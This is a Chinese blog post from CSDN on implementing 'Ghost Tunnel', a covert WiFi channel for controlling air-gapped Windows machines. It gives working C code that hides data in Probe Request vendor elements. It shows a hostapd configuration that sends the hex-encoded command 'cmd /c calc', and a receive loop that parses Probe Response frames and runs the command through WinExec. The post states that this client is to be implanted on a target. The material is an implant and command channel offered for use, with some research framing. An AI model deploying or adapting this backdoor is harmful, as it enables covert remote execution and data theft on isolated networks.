基于Ghost Tunnel的实践,实现Air Gapping环境下的通信与远程执行

最新推荐文章于 2024-06-18 09:42:12 发布
最新推荐文章于 2024-06-18 09:42:12 发布
阅读量1.5k 收藏
点赞数
分类专栏: 攻防 linux 网络 windows 文章标签: Ghost Tunnel Probe Request hostapd wifi Air Gapping
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_si_yan/article/details/80268937
版权
windows 同时被 3 个专栏收录
21 篇文章 0 订阅
订阅专栏
攻防
16 篇文章 0 订阅
订阅专栏
网络
8 篇文章 0 订阅
订阅专栏
Ghost Tunnel技术相关介绍请参考: Ghost Tunnel:适用于隔离网络的WiFi隐蔽传输通道》

通过文章我们知道,实现这种攻击需要满足一下条件:

  1. 需要在目标机中植入客户端程序,用以接收指令和发送目标机信息到控制端,植入方式可以为远程植入、现场植入;
  2. 目标机需要具备无线网络适配器,一般笔记本是自带无线网卡的,其它情况可以插入USB无线网卡实现;
  3. 目标机发送数据利用的是Probe Request帧实现,将待发送的数据附加到Probe Request帧中,封装成有效载荷并发送;
  4. 目标机接收数据利用的是Probe Response帧实现,以同样的方式附加有效载荷到Probe Response帧中;

实践平台环境:

目标机:IBM 笔记本 windows 7 x64系统

控制机:Ubuntu x64系统

控制端程序:hostapd

根据相关文档介绍,有效载荷的数据存储结构如下:

Element IDPayload LengthPayload
1 byte1 byte0-240
对此设计数据结构: 
#include <PshPack1.h>
struct ie_data  
{
	unsigned char id;
	unsigned char len;
	unsigned char val[1];
};
#include <PopPack.h>

数据结构要1字节对齐。

在windows平台,发送、接收数据用到的API主要有一下几个:

WlanEnumInterfaces

WlanScan

WlanGetNetworkBssList

这里贴出封装发送Payload的主要代码:

struct ie_data		*piedata = NULL;
int			response_len = 0;
char			*response = NULL;

response_len = sizeof(WLAN_RAW_DATA) -1 + sizeof(struct ie_data) -1 + len;
response = (char *)malloc(response_len);
memset(response, '\0', response_len);

pwlan_data = (PWLAN_RAW_DATA)response;
pwlan_data->dwDataSize = sizeof(struct ie_data) - 1 + len;
piedata = (struct ie_data *)&pwlan_data->DataBlob[0];
piedata->id = (char)221;
piedata->len = len;
memcpy(&piedata->val[0], buf, len);

这里的221(0xDD)根据MSDN文档介绍设置,buf为需要发送的数据(最大长度240字节),len为数据长度;将封装好的payload附加到Probe Request帧的最后发送出去,通过wireshark抓包来查看发送的情况,如下图所示:


主控端为使用hostapd创建的一个AP热点,AP热点的SSID为ghosttunnel,所以这里的SSID为ghosttunnel,发送的内容为“command ok.”

主控端发送数据(指令)可以通过hostapd配置文件中的vendor_elements字段来实现:

vendor_elements=dd0e636363636d64202f632063616c63

其中dd为Element ID,0e为Payload的长度,636363636d64202f632063616c63为发送的指令字符串的十六进制形式,实际字符串为:"ccccmd /c calc",该指令字符串前面之所以有“ccc”,是以此作为一个简单的magic,在接收指令时通过该“magic”判断是否为主控端发送的指令,也可通过其它内容作为magic,看具体实现。

下图是通过wireshark抓包到的控制端发送的Probe Response帧数据,从中可以清晰的看到发送的指令:


这里贴出接收Probe Response帧并解析出指令的代码,我们需要从多个Tag中解析出含有指令的Tag项:

if (stricmp((char *)bss_entry->dot11Ssid.ucSSID, "ghosttunnel") == 0)
{
	char *pp = (char *)((unsigned long)bss_entry + bss_entry->ulIeOffset);
	int total_size = bss_entry->ulIeSize;

	for (;;)
	{
		ie = (struct ie_data *)pp;
		if ((int)ie->id == 221)
		{
			// eg. "ccccmd /c calc"
			char *magic = (char *)&ie->val[0];
			if (strncmp(magic, "ccc", 3) == 0)
			{
				char command[240] = {0};
				strncpy(command, magic + 3, ie->len - 3);
				WinExec(command, SW_NORMAL);
				break;
			}
		}
		pp += sizeof(struct ie_data) - 1 + (int)ie->len;
		total_size -= sizeof(struct ie_data) - 1 + (int)ie->len; 
		if (!total_size)
		{
			break;	// over
		}
	}
}
通过一个循环从Probe Response帧中找到Payload的数据并执行指令。


_Noema
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GhostTunnel2:幽灵隧道2
04-30
GhostTunnel2 -1.GhostTunnel2全部代码由jerryma0912( )所写; -2.相较于第一版,增加了文件传输的功能,控制端可以向被控端传输小型文件; -3.利用creatprocess创建子进程解决了第一版中notepad等部分指令中断的问题;
cpp-GhostTunnel是一种隐蔽的后门传输方法可以在隔离环境中使用
08-16
GhostTunnel是一种隐蔽的后门传输方法,可以在隔离环境中使用
Ghost Tunnel
sectown的博客
06-11 579
近年来,网络攻击事件频发,许多公共系统都会选择用物理隔离(Air-Gapping)的手段来使自己的计算机免受来自外界的病毒或者通过网络数据渗透主机等外部攻击。Air-Gapping是一种用于保护特定网络,采用物理隔离的安全措施,通常被用来防止通过网络连接途径造成的入侵事件及信息泄漏事件。网络隔离被认为是非常安全的一种措施,对其的攻击是非常困难的。攻击者无论是想利用操作系统、应用软件还是通信协议上的...
探秘无线域内的隐形使者 —— GhostTunnel项目详解与推荐
最新发布
gitblog_00052的博客
06-18 267
探秘无线域内的隐形使者 —— GhostTunnel项目详解与推荐 项目地址:https://gitcode.com/JcQSteven/GhostTunnel 项目介绍 GhostTunnel,一个灵感源自360安全团队理念却独立实现的开源项目,终于揭开它神秘的面纱。该项目旨在构建一个基于无线网络探针请求与响应机制的隐秘通信隧道,让设备间的秘密指令传递变得可能。尽管最初的概念来自于360的安全研...
yunsle_ghost_tunnel:尝试实现一下Ghost Tunnel中的通信方式
05-08
yunsle_ghost_tunnel尝试实现Ghost Tunnel中的通信方式注意:控制端使用python的scapy库,需开启无线网卡的monitor模式iwconfig wlan0 mode monitor相关的具体介绍:师兄的整合项目地址:
PTN技术与应用S15-PTN Tunnel通信测试.pptx
10-29
"PTN技术与应用S15-PTN Tunnel通信测试" PTN技术是 Packet Transport Network 的缩写,指的是一种面向 packet 传输的网络架构。PTN 技术主要应用于电信运营商的骨干网络和城域网中,旨在提高网络的可靠性、灵活性和...
远程p2p nabto_tunnel
09-29
nabto 操作系统linux 平台适用于arm/x86/mips
基于Linux的MPD软件包的设计与实现.pdf
09-07
【基于Linux的MPD软件包的设计与实现】 MPD(Multi-Link Point-to-Point Protocol Daemon)软件包是一个专门设计用于Linux操作系统的用户态软件,它实现了MP协议,旨在提高网络连接的效率和带宽利用率。MP协议是PPP...
移动通信承载网-维护与调测PTN网络.pptx
11-27
【移动通信承载网】是指用于承载移动通信业务的网络架构,它主要负责移动通信基站、核心网络以及其他关键通信节点之间的数据传输。随着技术的发展,PTN(Packet Transport Network,分组传送网)作为一种高效、灵活...
版本:《 Ghost通讯》主题
02-05
版 的新闻通讯主题。 这是Edition的最新开发版本! 如果您只是想下载最新版本,请转到“页面。 发展历程 版本样式使用Gulp / PostCSS进行编译,以填充将来CSS规范。 您将需要全局安装 , 和 。 之后,从主题的根目录: # Install yarn # Run build & watch for changes $ yarn dev 现在,您可以编辑/assets/css/文件,这些文件将自动编译为/assets/built/ 。 zip Gulp任务将主题文件打包到dist/<theme>.zip ,然后可以将其上传到您的站点。 # create .zip
ghostunnel:具有相互身份验证的简单SSLTLS代理,可保护非TLS服务
02-02
幽灵隧道 :ghost: Ghostunnel是具有相互身份验证支持的简单TLS代理,用于保护非TLS后端应用程序。 Ghostunnel支持两种模式,客户端模式和服务器模式。 服务器模式下的Ghostunnel在后端服务器之前运行,并接受TLS保护的连接,然后将这些代理连接到(不安全的)后端。 后端可以是TCP域/端口或UNIX域套接字。 客户端模式下的Ghostunnel通过TCP或UNIX域套接字接受(不安全的)连接,并将其代理到TLS安全的服务。 换句话说,ghostunnel可以替代tunnel。 支持的平台:Ghostunnel主要为x86-64平台上Linux开发,尽管它可以在任何公开SO_REUSEPORT UNIX系统上运行,包括Darwin(macOS),FreeBSD,OpenBSD和NetBSD。 Ghostunnel还支持在Windows上运行,但功能集有所减少。 我们建议在x86-64上运行,以受益于其他平台上不提供的加密算法的恒定时间实现。 请参见ghostunnel --help , ghostunnel server --help和ghost
ghost协议
kay
08-08 1324
为什么要引入ghost协议? 1.以太坊出块时间是12s左右,相比于比特币的10分钟,快了很多。在比特币网络中对叔块是没有奖励的,但以太坊的出块时间快将导致会有更多的孤块产生,更多的叔块意味着更多的矿工会因为挖到孤块而做无用功。 2.以太坊采用子块最多的链为主链而不是最长的链,为了解决中心化的问题,一个矿池算力越大意味着挖到块的时间越短,同时也将出现算力大的能够更容易成为最长的链。 ghos...
gost 常用tunnel配置示例(隧道模式)
闲人的专栏
01-29 3187
gost是用golang语言实现的一个安全隧道。是一个不可多得的隧道工具。至于什么是隧道?就是可以通过这个工具传输一些其他协议的数据。就像这个样子。
Ghost远程终端管理
走在成长的路上
05-23 1946
主要分析,客户端连接上主控端后,主控端主动要求进行终端管理后的一系列实现过程。 一、主控端发起远控申请指令COMMAND_SHELL 1、点击“终端管理”按钮后,主控端获取要进行远控的客户端(这里我习惯称为客户端,也有人称被控端为服务端)连接上来的套接字,然后向该客户端发送指令COMMAND_SHELL 二、客户端对收到的远控申请处理 1、客户端的工作线程WorkThread收到主控端...
Gost加密隧道中转方案搭建及原理讲解
热门推荐
qq_32581869的博客
04-11 1万+
GOST加密隧道介绍: GOST是一款用GO语言实现的安全隧道软件,gost安全隧道使用的是 Relay+tls 的协议,将流量加密并混淆成普通的上网流量,让流量特征监控失效。Relay协议同时具有代理和转发功能,可同时处理TCP和UDP的数据,并支持用户认证。TLS是一种加密传输协议,用于在两个通信应用程序之间提供保密性和数据完整性。 Gost 隧道需要两端,即服务端与客户端才能组成一条加密隧道, 所以需要一台境外服务器做服务端,同时在你的本地也需要一台客户端(可以是矿机本身,也可以是任意一台能运行
ghostscript 远程命令执行漏洞复现
andiao1218的博客
08-23 532
影响的版本 <= 9.23(全版本、全平台) Ubuntu 开启 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null 依次输入 legal { null restore } stopped { pop } if legal mark /O...
"PTN Tunnel通信测试与应用指南
PTN技术与应用S15-PTN Tunnel通信测试.pptx是一份关于PTN技术与应用中Tunnel通信测试的演示文件。该文件包括Tunnel LSP Ping测试和Tunnel单站测试两部分内容,旨在帮助用户了解如何进行PTN Tunnel通信的测试与诊断。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值